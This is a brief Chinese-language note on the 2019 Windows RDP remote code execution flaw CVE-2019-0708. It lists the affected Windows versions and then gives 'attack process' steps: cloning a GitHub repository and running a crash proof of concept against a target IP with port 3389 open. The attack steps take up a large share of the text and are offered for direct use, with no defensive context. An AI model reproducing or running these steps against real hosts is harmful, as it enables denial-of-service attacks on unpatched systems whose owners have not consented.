20190514,微软发布补丁,修复了一个严重的RDP远程代码执行漏洞。该漏洞无需身份认证和用户交互,可能形成蠕虫爆发,影响堪比wannycry。
影响范围:
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows Server 2003
Windows XP
攻击过程:
git clone https://github.com/wanglf/CVE-2019-0708.git pip install -r requirements.txt python crashpoc.py 目标IP 前期是对方必须开启了3389端口